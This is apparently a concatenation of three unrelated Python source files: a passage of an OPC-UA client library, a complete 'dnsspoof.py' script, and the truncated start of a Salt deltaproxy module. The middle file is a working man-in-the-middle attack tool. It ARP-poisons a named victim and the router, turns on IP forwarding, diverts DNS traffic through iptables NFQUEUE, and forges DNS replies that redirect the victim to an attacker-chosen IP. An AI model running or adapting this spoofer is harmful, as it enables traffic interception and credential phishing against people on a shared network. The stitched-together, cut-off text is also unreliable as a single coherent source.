def send_request(self, request, callback=None, timeout=1000, message_type=ua.MessageType.SecureMessage):
    """
    send request to server.
    timeout is the timeout written in ua header
    returns response object if no callback is provided
    """
    future = self._send_request(request, callback, timeout, message_type)
    if not callback:
        data = future.result(self.timeout)
        self.check_answer(data, " in response to " + request.__class__.__name__)
        return data
def check_answer(self, data, context):
    """Raise (via ServiceResult.check) if *data* is a ServiceFault; return
    False for a fault that checks clean, True otherwise."""
    data = data.copy()
    typeid = nodeid_from_binary(data)
    if typeid == ua.FourByteNodeId(ua.ObjectIds.ServiceFault_Encoding_DefaultBinary):
        self.logger.warning("ServiceFault from server received %s", context)
        hdr = struct_from_binary(ua.ResponseHeader, data)
        hdr.ServiceResult.check()
        return False
    return True

def _run(self):
    """Receiver-thread main loop: pump _receive() until stop or socket close."""
    self.logger.info("Thread started")
    while not self._do_stop:
        try:
            self._receive()
        except ua.utils.SocketClosedException:
            self.logger.info("Socket has closed connection")
            break
        except UaError:
            self.logger.exception("Protocol Error")
    self.logger.info("Thread ended")
def _receive(self):
    """Read one message from the socket and dispatch it to the waiting Future.

    Acknowledge messages are keyed under request id 0 (see send_hello).
    """
    msg = self._connection.receive_from_socket(self._socket)
    if msg is None:
        return
    elif isinstance(msg, ua.Message):
        self._call_callback(msg.request_id(), msg.body())
    elif isinstance(msg, ua.Acknowledge):
        self._call_callback(0, msg)
    elif isinstance(msg, ua.ErrorMessage):
        self.logger.warning("Received an error: %s", msg)
    else:
        raise ua.UaError("Unsupported message type: %s", msg)

def _call_callback(self, request_id, body):
    """Resolve the Future registered for *request_id* with *body*."""
    with self._lock:
        future = self._callbackmap.pop(request_id, None)
        if future is None:
            raise ua.UaError(
                "No future object found for request: {0}, callbacks in list are {1}"
                .format(request_id, self._callbackmap.keys())
            )
    future.set_result(body)
def _create_request_header(self, timeout=1000):
    """Build a RequestHeader carrying the session token and a fresh handle.

    Increments self._request_handle; _send_request rolls it back on
    serialization failure.
    """
    self._request_handle += 1
    header = ua.RequestHeader()
    header.AuthenticationToken = self.authentication_token
    header.RequestHandle = self._request_handle
    header.TimeoutHint = timeout
    return header
def connect_socket(self, host, port):
    """
    connect to server socket and start receiving thread
    """
    self.logger.info("opening connection")
    sock = socket.create_connection((host, port))
    # nodelay necessary to avoid packing in one frame, some servers do not like it
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    self._socket = ua.utils.SocketWrapper(sock)
    self.start()
def disconnect_socket(self):
    """Shut down the socket, stop the receiver thread and clear callbacks."""
    import errno  # FIX: errno was referenced below but never imported (NameError)
    self.logger.info("Request to close socket received")
    self._do_stop = True
    try:
        self._socket.socket.shutdown(socket.SHUT_RDWR)
    except (socket.error, OSError) as exc:
        if exc.errno in (errno.ENOTCONN, errno.EBADF):
            pass  # Socket is not connected, so can't send FIN packet.
        else:
            raise
    self._socket.socket.close()
    self.logger.info("Socket closed, waiting for receiver thread to terminate...")
    if self._thread and self._thread.is_alive():
        self._thread.join()
    self._callbackmap.clear()
    self.logger.info("Done closing socket: Receiving thread terminated, socket disconnected")
def send_hello(self, url, max_messagesize=0, max_chunkcount=0):
    """Send a UA TCP Hello and block for the server's Acknowledge.

    The Acknowledge carries no request id, so it is registered under key 0.
    """
    hello = ua.Hello()
    hello.EndpointUrl = url
    hello.MaxMessageSize = max_messagesize
    hello.MaxChunkCount = max_chunkcount
    future = Future()
    with self._lock:
        self._callbackmap[0] = future
    binmsg = uatcp_to_binary(ua.MessageType.Hello, hello)
    self._socket.write(binmsg)
    ack = future.result(self.timeout)
    return ack

def open_secure_channel(self, params):
    """Open (or renew) the secure channel and install the returned token."""
    self.logger.info("open_secure_channel")
    request = ua.OpenSecureChannelRequest()
    request.Parameters = params
    future = self._send_request(request, message_type=ua.MessageType.SecureOpen)
    # FIXME: we have a race condition here
    # we can get a packet with the new token id before we reach to store it..
    response = struct_from_binary(ua.OpenSecureChannelResponse, future.result(self.timeout))
    response.ResponseHeader.ServiceResult.check()
    self._connection.set_channel(response.Parameters)
    return response.Parameters
def close_secure_channel(self):
    """
    close secure channel. It seems to trigger a shutdown of socket in most servers, so be prepare to reconnect.
    OPC UA specs Part 6, 7.1.4 say that Server does not send a CloseSecureChannel response and should just close
    socket
    """
    import errno  # FIX: errno was referenced below but never imported (NameError)
    self.logger.info("close_secure_channel")
    request = ua.CloseSecureChannelRequest()
    try:
        future = self._send_request(request, message_type=ua.MessageType.SecureClose)
        with self._lock:
            # some servers send a response here, most do not ... so we ignore
            future.cancel()
    except (socket.error, OSError) as exc:
        if exc.errno in (errno.ENOTCONN, errno.EBADF):
            # Socket is closed, so can't send CloseSecureChannelRequest.
            self.logger.warning("close_secure_channel() failed: socket already closed")
        else:
            raise
def is_secure_channel_open(self):
    """Return True while the underlying secure connection is open."""
    return self._connection.is_open()
class UaClient(object):
"""
low level OPC-UA client.
It implements (almost) all methods defined in opcua spec
taking in argument the structures defined in opcua spec.
In this Python implementation most of the structures are defined in
uaprotocol_auto.py and uaprotocol_hand.py available under opcua.ua
"""
def __init__(self, timeout=1):
    """Create an unconnected client; *timeout* is the per-answer wait in s."""
    self.logger = logging.getLogger(__name__)
    # _publishcallbacks should be accessed in recv thread only
    self._publishcallbacks = {}
    self._timeout = timeout
    self._uasocket = None
    self.security_policy = ua.SecurityPolicy()

def set_security(self, policy):
    """Set the SecurityPolicy used by the next connect_socket()."""
    self.security_policy = policy

def connect_socket(self, host, port):
    """
    connect to server socket and start receiving thread
    """
    self._uasocket = UASocketClient(self._timeout, security_policy=self.security_policy)
    return self._uasocket.connect_socket(host, port)

def disconnect_socket(self):
    """Close the underlying socket and stop its receiver thread."""
    return self._uasocket.disconnect_socket()

def send_hello(self, url, max_messagesize=0, max_chunkcount=0):
    """Delegate the UA TCP Hello/Acknowledge handshake to the socket layer."""
    return self._uasocket.send_hello(url, max_messagesize, max_chunkcount)

def open_secure_channel(self, params):
    """Open (or renew) the secure channel on the current socket."""
    return self._uasocket.open_secure_channel(params)

def close_secure_channel(self):
    """
    close secure channel. It seems to trigger a shutdown of socket
    in most servers, so be prepare to reconnect
    """
    return self._uasocket.close_secure_channel()
def create_session(self, parameters):
    """CreateSession service; stores the returned authentication token for
    all subsequent requests."""
    self.logger.info("create_session")
    request = ua.CreateSessionRequest()
    request.Parameters = parameters
    data = self._uasocket.send_request(request)
    response = struct_from_binary(ua.CreateSessionResponse, data)
    self.logger.debug(response)
    response.ResponseHeader.ServiceResult.check()
    self._uasocket.authentication_token = response.Parameters.AuthenticationToken
    return response.Parameters

def activate_session(self, parameters):
    """ActivateSession service."""
    self.logger.info("activate_session")
    request = ua.ActivateSessionRequest()
    request.Parameters = parameters
    data = self._uasocket.send_request(request)
    response = struct_from_binary(ua.ActivateSessionResponse, data)
    self.logger.debug(response)
    response.ResponseHeader.ServiceResult.check()
    return response.Parameters

def close_session(self, deletesubscriptions):
    """CloseSession service; no-op when the secure channel is already gone."""
    self.logger.info("close_session")
    # Bail out if we don't have an open server-channel to unsubscribe ourself.
    if not self._uasocket.is_secure_channel_open():
        return
    request = ua.CloseSessionRequest()
    request.DeleteSubscriptions = deletesubscriptions
    data = self._uasocket.send_request(request)
    response = struct_from_binary(ua.CloseSessionResponse, data)
    try:
        response.ResponseHeader.ServiceResult.check()
    except BadSessionClosed:
        # Problem: closing the session with open publish requests leads to BadSessionClosed responses
        # we can just ignore it therefore.
        # Alternatively we could make sure that there are no publish requests in flight when
        # closing the session.
        pass
def browse(self, parameters):
    """Browse service."""
    self.logger.info("browse")
    request = ua.BrowseRequest()
    request.Parameters = parameters
    data = self._uasocket.send_request(request)
    response = struct_from_binary(ua.BrowseResponse, data)
    self.logger.debug(response)
    response.ResponseHeader.ServiceResult.check()
    return response.Results

def browse_next(self, parameters):
    """BrowseNext service (continuation of a Browse)."""
    self.logger.info("browse next")
    request = ua.BrowseNextRequest()
    request.Parameters = parameters
    data = self._uasocket.send_request(request)
    response = struct_from_binary(ua.BrowseNextResponse, data)
    self.logger.debug(response)
    response.ResponseHeader.ServiceResult.check()
    return response.Parameters.Results

def read(self, parameters):
    """Read service; NodeClass/ValueRank results are re-wrapped as enums."""
    self.logger.info("read")
    request = ua.ReadRequest()
    request.Parameters = parameters
    data = self._uasocket.send_request(request)
    response = struct_from_binary(ua.ReadResponse, data)
    self.logger.debug(response)
    response.ResponseHeader.ServiceResult.check()
    # cast to Enum attributes that need to
    for idx, rv in enumerate(parameters.NodesToRead):
        if rv.AttributeId == ua.AttributeIds.NodeClass:
            dv = response.Results[idx]
            if dv.StatusCode.is_good():
                dv.Value.Value = ua.NodeClass(dv.Value.Value)
        elif rv.AttributeId == ua.AttributeIds.ValueRank:
            dv = response.Results[idx]
            if dv.StatusCode.is_good() and dv.Value.Value in (-3, -2, -1, 0, 1, 2, 3, 4):
                dv.Value.Value = ua.ValueRank(dv.Value.Value)
    return response.Results
def write(self, params):
self.logger.info("read")
request = ua.WriteRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.WriteResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def get_endpoints(self, params):
self.logger.info("get_endpoint")
request = ua.GetEndpointsRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.GetEndpointsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Endpoints
def find_servers(self, params):
self.logger.info("find_servers")
request = ua.FindServersRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.FindServersResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Servers
def find_servers_on_network(self, params):
self.logger.info("find_servers_on_network")
request = ua.FindServersOnNetworkRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.FindServersOnNetworkResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Parameters
def register_server(self, registered_server):
self.logger.info("register_server")
request = ua.RegisterServerRequest()
request.Server = registered_server
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.RegisterServerResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
# nothing to return for this service
def register_server2(self, params):
self.logger.info("register_server2")
request = ua.RegisterServer2Request()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.RegisterServer2Response, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.ConfigurationResults
def translate_browsepaths_to_nodeids(self, browsepaths):
self.logger.info("translate_browsepath_to_nodeid")
request = ua.TranslateBrowsePathsToNodeIdsRequest()
request.Parameters.BrowsePaths = browsepaths
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.TranslateBrowsePathsToNodeIdsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def create_subscription(self, params, callback):
self.logger.info("create_subscription")
request = ua.CreateSubscriptionRequest()
request.Parameters = params
resp_fut = Future()
mycallbak = partial(self._create_subscription_callback, callback, resp_fut)
self._uasocket.send_request(request, mycallbak)
return resp_fut.result(self._timeout)
def _create_subscription_callback(self, pub_callback, resp_fut, data_fut):
self.logger.info("_create_subscription_callback")
data = data_fut.result()
response = struct_from_binary(ua.CreateSubscriptionResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
self._publishcallbacks[response.Parameters.SubscriptionId] = pub_callback
resp_fut.set_result(response.Parameters)
def delete_subscriptions(self, subscriptionids):
self.logger.info("delete_subscription")
request = ua.DeleteSubscriptionsRequest()
request.Parameters.SubscriptionIds = subscriptionids
resp_fut = Future()
mycallbak = partial(self._delete_subscriptions_callback, subscriptionids, resp_fut)
self._uasocket.send_request(request, mycallbak)
return resp_fut.result(self._timeout)
def _delete_subscriptions_callback(self, subscriptionids, resp_fut, data_fut):
self.logger.info("_delete_subscriptions_callback")
data = data_fut.result()
response = struct_from_binary(ua.DeleteSubscriptionsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
for sid in subscriptionids:
self._publishcallbacks.pop(sid)
resp_fut.set_result(response.Results)
def publish(self, acks=None):
self.logger.info("publish")
if acks is None:
acks = []
request = ua.PublishRequest()
request.Parameters.SubscriptionAcknowledgements = acks
self._uasocket.send_request(request, self._call_publish_callback, timeout=0)
def _call_publish_callback(self, future):
self.logger.info("call_publish_callback")
data = future.result()
# check if answer looks ok
try:
self._uasocket.check_answer(data, "while waiting for publish response")
except BadTimeout: # Spec Part 4, 7.28
self.publish()
return
except BadNoSubscription: # Spec Part 5, 13.8.1
# BadNoSubscription is expected after deleting the last subscription.
#
# We should therefore also check for len(self._publishcallbacks) == 0, but
# this gets us into trouble if a Publish response arrives before the
# DeleteSubscription response.
#
# We could remove the callback already when sending the DeleteSubscription request,
# but there are some legitimate reasons to keep them around, such as when the server
# responds with "BadTimeout" and we should try again later instead of just removing
# the subscription client-side.
#
# There are a variety of ways to act correctly, but the most practical solution seems
# to be to just ignore any BadNoSubscription responses.
self.logger.info("BadNoSubscription received, ignoring because it's probably valid.")
return
# parse publish response
try:
response = struct_from_binary(ua.PublishResponse, data)
self.logger.debug(response)
except Exception:
# INFO: catching the exception here might be obsolete because we already
# catch BadTimeout above. However, it's not really clear what this code
# does so it stays in, doesn't seem to hurt.
self.logger.exception("Error parsing notificatipn from server")
self.publish([]) # send publish request ot server so he does stop sending notifications
return
# look for callback
try:
callback = self._publishcallbacks[response.Parameters.SubscriptionId]
except KeyError:
self.logger.warning("Received data for unknown subscription: %s ", response.Parameters.SubscriptionId)
return
# do callback
try:
callback(response.Parameters)
except Exception: # we call client code, catch everything!
self.logger.exception("Exception while calling user callback: %s")
def create_monitored_items(self, params):
self.logger.info("create_monitored_items")
request = ua.CreateMonitoredItemsRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.CreateMonitoredItemsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def delete_monitored_items(self, params):
self.logger.info("delete_monitored_items")
request = ua.DeleteMonitoredItemsRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.DeleteMonitoredItemsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def add_nodes(self, nodestoadd):
self.logger.info("add_nodes")
request = ua.AddNodesRequest()
request.Parameters.NodesToAdd = nodestoadd
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.AddNodesResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def add_references(self, refs):
self.logger.info("add_references")
request = ua.AddReferencesRequest()
request.Parameters.ReferencesToAdd = refs
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.AddReferencesResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def delete_references(self, refs):
self.logger.info("delete")
request = ua.DeleteReferencesRequest()
request.Parameters.ReferencesToDelete = refs
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.DeleteReferencesResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Parameters.Results
def delete_nodes(self, params):
self.logger.info("delete_nodes")
request = ua.DeleteNodesRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.DeleteNodesResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def call(self, methodstocall):
request = ua.CallRequest()
request.Parameters.MethodsToCall = methodstocall
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.CallResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def history_read(self, params):
self.logger.info("history_read")
request = ua.HistoryReadRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.HistoryReadResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def modify_monitored_items(self, params):
self.logger.info("modify_monitored_items")
request = ua.ModifyMonitoredItemsRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.ModifyMonitoredItemsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
|
dnsspoof.py | from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
import os
import nfqueue
from scapy.all import *
import argparse
import threading
import signal
def arg_parser(argv=None):
    """Build the CLI parser and parse *argv*.

    Generalization (backward compatible): *argv* defaults to None, in which
    case argparse reads sys.argv[1:] exactly as before; tests and callers can
    now pass an explicit argument list.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-d", "--domain", help="Choose the domain to spoof. Example: -d facebook.com")
    parser.add_argument("-r", "--routerIP", help="Choose the router IP. Example: -r 192.168.0.1")
    parser.add_argument("-v", "--victimIP", help="Choose the victim IP. Example: -v 192.168.0.5")
    parser.add_argument("-t", "--redirectto", help="Optional argument to choose the IP to which the victim will be redirected \
otherwise defaults to attacker's local IP. Requires either the -d or -a argument. Example: -t 80.87.128.67")
    parser.add_argument("-a", "--spoofall", help="Spoof all DNS requests back to the attacker or use -r to specify an IP to redirect them to", action="store_true")
    return parser.parse_args(argv)
def originalMAC(ip):
    """ARP-resolve *ip* on the LAN; return the MAC of the first responder, or None."""
    answered, _unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=5, retry=3)
    for _sent, reply in answered:
        return reply[Ether].src
def poison(routerIP, victimIP, routerMAC, victimMAC):
    """Send one round of forged ARP replies so victim and router each map the
    other's IP to the attacker's MAC (standard ARP cache poisoning)."""
    to_victim = ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC)
    to_router = ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC)
    send(to_victim)
    send(to_router)
def restore(routerIP, victimIP, routerMAC, victimMAC):
    """Broadcast correct ARP mappings to heal the poisoned caches.

    Bug fix: this function previously called sys.exit(0) after sending the
    healing packets, which made the iptables cleanup (and the second restore
    call) in main()'s signal handler unreachable. The caller is responsible
    for terminating the process.
    """
    send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
    send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
def cb(payload):
    """NFQUEUE callback: accept non-DNS packets, answer DNS queries with a
    spoofed response according to the CLI options.

    Performance fix: the original re-ran arg_parser() (a full CLI re-parse)
    up to five times per packet; the options are parsed once per call now.
    Behavior is unchanged, including sending two spoofed replies when both
    --spoofall and a matching --domain are given.
    """
    data = payload.get_data()
    pkt = IP(data)
    # First non-default route's source address = attacker's local IP.
    localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0]
    if not pkt.haslayer(DNSQR):
        payload.set_verdict(nfqueue.NF_ACCEPT)
    else:
        args = arg_parser()
        # Redirect target: explicit -t address, else our own IP.
        target = args.redirectto if args.redirectto else localIP
        if args.spoofall:
            spoofed_pkt(payload, pkt, target)
        if args.domain:
            if args.domain in pkt[DNS].qd.qname:
                spoofed_pkt(payload, pkt, target)
def spoofed_pkt(payload, pkt, rIP):
    """Forge a DNS answer for the query in *pkt* pointing at *rIP* and emit it
    as the NFQUEUE verdict (replacing the original packet)."""
    answer = DNS(
        id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,
        an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=rIP),
    )
    forged = IP(dst=pkt[IP].src, src=pkt[IP].dst) / UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / answer
    payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(forged), len(forged))
    print('[+] Sent spoofed packet for %s' % pkt[DNSQR].qname[:-1])
class Queued(object):
    """Bridge an nfqueue netlink socket into the Twisted reactor.

    Implements the minimal IReadDescriptor interface (fileno/doRead/
    connectionLost/logPrefix) so the reactor polls the queue's fd and drains
    pending packets through cb().
    """
    def __init__(self):
        # Bind queue 0 (the default NFQUEUE number used by the iptables rule
        # added in main()) and route packets through cb().
        self.q = nfqueue.queue()
        self.q.set_callback(cb)
        self.q.fast_open(0, socket.AF_INET)
        self.q.set_queue_maxlen(5000)
        reactor.addReader(self)
        # Copy full packet payloads to userspace so cb() can parse DNS.
        self.q.set_mode(nfqueue.NFQNL_COPY_PACKET)
        print '[*] Waiting for data'
    def fileno(self):
        # File descriptor the reactor selects on.
        return self.q.get_fd()
    def doRead(self):
        # Reactor says the fd is readable: process up to 100 queued packets.
        self.q.process_pending(100)
    def connectionLost(self, reason):
        reactor.removeReader(self)
    def logPrefix(self):
        # Prefix used by Twisted's logging for this reader.
        return 'queue'
def main(args):
global victimMAC, routerMAC
if os.geteuid() != 0:
sys.exit("[!] Please run as root")
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
ipf = open('/proc/sys/net/ipv4/ip_forward', 'r+')
ipf_read = ipf.read()
if ipf_read != '1\n':
ipf.write('1\n')
ipf.close()
routerMAC = originalMAC(args.routerIP)
victimMAC = originalMAC(args.victimIP)
if routerMAC == None:
sys.exit("Could not find router MAC address. Closing....")
if victimMAC == None:
sys.exit("Could not find victim MAC address. Closing....")
print '[*] Router MAC:',routerMAC
print '[*] Victim MAC:',victimMAC
Queued()
rctr = threading.Thread(target=reactor.run, args=(False,))
rctr.daemon = True
rctr.start()
def signal_handler(signal, frame):
print 'learing iptables, sending healing packets, and turning off IP forwarding...'
with open('/proc/sys/net/ipv4/ip_forward', 'w') as forward:
forward.write(ipf_read)
restore(args.routerIP, args.victimIP, routerMAC, victimMAC)
restore(args.routerIP, args.victimIP, routerMAC, victimMAC)
os.system('/sbin/iptables -F')
os.system('/sbin/iptables -X')
os.system('/sbin/iptables -t nat -F')
os.system('/sbin/iptables -t nat -X')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
while 1:
poison(args.routerIP, args.victimIP, routerMAC, victimMAC)
time.sleep(1.5)
# Script entry point: parse CLI arguments and launch the spoofer.
main(arg_parser())
|
deltaproxy.py | #
# Proxy minion metaproxy modules
#
import copy
import logging
import os
import sys
import threading
import traceback
import types
import salt
import salt.beacons
import salt.cli.daemons
import salt.client
import salt.config
import salt.crypt
import salt.defaults.exitcodes
import salt.engines
import salt.loader
import salt.log.setup
import salt.minion
import salt.payload
import salt.pillar
import salt.serializers.msgpack
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import tornado.gen
import tornado.ioloop
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltSystemExit,
)
from salt.minion import ProxyMinion
from salt.utils.event import tagify
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def post_master_init(self, master):
    """Finish deltaproxy minion initialization after the master connection.

    Runs as a tornado-style coroutine (note the ``yield`` on the async pillar
    calls). Compiles pillar, loads/repacks the control proxy's modules,
    registers scheduler jobs, then builds one sub-ProxyMinion per id listed
    under ``opts['proxy']['ids']``. Sets ``self.ready`` when done.

    :param master: the master address actually connected to; re-asserted into
        ``self.opts['master']`` below.
    """
    if self.connected:
        self.opts["pillar"] = yield salt.pillar.get_async_pillar(
            self.opts,
            self.opts["grains"],
            self.opts["id"],
            saltenv=self.opts["saltenv"],
            pillarenv=self.opts.get("pillarenv"),
        ).compile_pillar()
    # Ensure that the value of master is the one we passed in.
    # if pillar_opts is enabled then master could be overwritten
    # when compile_pillar is run.
    self.opts["master"] = master

    tag = "salt/deltaproxy/start"
    self._fire_master(tag=tag)

    # Without a proxy configuration there is nothing we can manage: abort.
    if "proxy" not in self.opts["pillar"] and "proxy" not in self.opts:
        errmsg = (
            "No proxy key found in pillar or opts for id {}. Check your pillar/opts "
            "configuration and contents. Salt-proxy aborted.".format(self.opts["id"])
        )
        log.error(errmsg)
        self._running = False
        raise SaltSystemExit(code=-1, msg=errmsg)

    if "proxy" not in self.opts:
        self.opts["proxy"] = self.opts["pillar"]["proxy"]

    # Merge pillar data into opts using the configured strategy.
    self.opts = salt.utils.dictupdate.merge(
        self.opts,
        self.opts["pillar"],
        strategy=self.opts.get("proxy_merge_pillar_in_opts_strategy"),
        merge_lists=self.opts.get("proxy_deep_merge_pillar_in_opts", False),
    )

    if self.opts.get("proxy_mines_pillar"):
        # Even when not required, some details such as mine configuration
        # should be merged anyway whenever possible.
        if "mine_interval" in self.opts["pillar"]:
            self.opts["mine_interval"] = self.opts["pillar"]["mine_interval"]
        if "mine_functions" in self.opts["pillar"]:
            general_proxy_mines = self.opts.get("mine_functions", [])
            specific_proxy_mines = self.opts["pillar"]["mine_functions"]
            try:
                self.opts["mine_functions"] = general_proxy_mines + specific_proxy_mines
            except TypeError as terr:
                # e.g. one side is a dict and the other a list; keep going
                # with whatever mine_functions was already set to.
                log.error(
                    "Unable to merge mine functions from the pillar in the opts, for proxy %s",
                    self.opts["id"],
                )

    fq_proxyname = self.opts["proxy"]["proxytype"]

    # Need to load the modules so they get all the dunder variables
    (
        self.functions,
        self.returners,
        self.function_errors,
        self.executors,
    ) = self._load_modules()

    # we can then sync any proxymodules down from the master
    # we do a sync_all here in case proxy code was installed by
    # SPM or was manually placed in /srv/salt/_modules etc.
    self.functions["saltutil.sync_all"](saltenv=self.opts["saltenv"])

    # Pull in the utils
    self.utils = salt.loader.utils(self.opts)

    # Then load the proxy module
    self.proxy = salt.loader.proxy(self.opts, utils=self.utils)

    # And re-load the modules so the __proxy__ variable gets injected
    (
        self.functions,
        self.returners,
        self.function_errors,
        self.executors,
    ) = self._load_modules()
    self.functions.pack["__proxy__"] = self.proxy
    self.proxy.pack["__salt__"] = self.functions
    self.proxy.pack["__ret__"] = self.returners
    self.proxy.pack["__pillar__"] = self.opts["pillar"]

    # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
    self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
    self.proxy.pack["__utils__"] = self.utils

    # Reload all modules so all dunder variables are injected
    self.proxy.reload_modules()

    # Start engines here instead of in the Minion superclass __init__
    # This is because we need to inject the __proxy__ variable but
    # it is not setup until now.
    self.io_loop.spawn_callback(
        salt.engines.start_engines, self.opts, self.process_manager, proxy=self.proxy
    )

    # A proxymodule without both init() and shutdown() is unusable: abort.
    proxy_init_func_name = "{}.init".format(fq_proxyname)
    proxy_shutdown_func_name = "{}.shutdown".format(fq_proxyname)
    if (
        proxy_init_func_name not in self.proxy
        or proxy_shutdown_func_name not in self.proxy
    ):
        errmsg = (
            "Proxymodule {} is missing an init() or a shutdown() or both. "
            "Check your proxymodule. Salt-proxy aborted.".format(fq_proxyname)
        )
        log.error(errmsg)
        self._running = False
        raise SaltSystemExit(code=-1, msg=errmsg)

    # Optional per-proxymodule executors; the lambda default yields [].
    self.module_executors = self.proxy.get(
        "{}.module_executors".format(fq_proxyname), lambda: []
    )()
    proxy_init_fn = self.proxy[proxy_init_func_name]
    proxy_init_fn(self.opts)

    self.opts["grains"] = salt.loader.grains(self.opts, proxy=self.proxy)

    self.serial = salt.payload.Serial(self.opts)
    self.mod_opts = self._prep_mod_opts()
    self.matchers = salt.loader.matchers(self.opts)
    self.beacons = salt.beacons.Beacon(self.opts, self.functions)
    uid = salt.utils.user.get_uid(user=self.opts.get("user", None))
    self.proc_dir = salt.minion.get_proc_dir(self.opts["cachedir"], uid=uid)

    if self.connected and self.opts["pillar"]:
        # The pillar has changed due to the connection to the master.
        # Reload the functions so that they can use the new pillar data.
        (
            self.functions,
            self.returners,
            self.function_errors,
            self.executors,
        ) = self._load_modules()
        if hasattr(self, "schedule"):
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners

    if not hasattr(self, "schedule"):
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners,
            cleanup=[salt.minion.master_event(type="alive")],
            proxy=self.proxy,
            _subprocess_list=self.subprocess_list,
        )

    # add default scheduling jobs to the minions scheduler
    if self.opts["mine_enabled"] and "mine.update" in self.functions:
        self.schedule.add_job(
            {
                "__mine_interval": {
                    "function": "mine.update",
                    "minutes": self.opts["mine_interval"],
                    "jid_include": True,
                    "maxrunning": 2,
                    "run_on_start": True,
                    "return_job": self.opts.get("mine_return_job", False),
                }
            },
            persist=True,
        )
        log.info("Added mine.update to scheduler")
    else:
        self.schedule.delete_job("__mine_interval", persist=True)

    # add master_alive job if enabled
    if self.opts["transport"] != "tcp" and self.opts["master_alive_interval"] > 0:
        self.schedule.add_job(
            {
                salt.minion.master_event(type="alive", master=self.opts["master"]): {
                    "function": "status.master",
                    "seconds": self.opts["master_alive_interval"],
                    "jid_include": True,
                    "maxrunning": 1,
                    "return_job": False,
                    "kwargs": {"master": self.opts["master"], "connected": True},
                }
            },
            persist=True,
        )
        # Failback job only makes sense when we are not already on the
        # primary master of the configured master_list.
        if (
            self.opts["master_failback"]
            and "master_list" in self.opts
            and self.opts["master"] != self.opts["master_list"][0]
        ):
            self.schedule.add_job(
                {
                    salt.minion.master_event(type="failback"): {
                        "function": "status.ping_master",
                        "seconds": self.opts["master_failback_interval"],
                        "jid_include": True,
                        "maxrunning": 1,
                        "return_job": False,
                        "kwargs": {"master": self.opts["master_list"][0]},
                    }
                },
                persist=True,
            )
        else:
            self.schedule.delete_job(
                salt.minion.master_event(type="failback"), persist=True
            )
    else:
        self.schedule.delete_job(
            salt.minion.master_event(type="alive", master=self.opts["master"]),
            persist=True,
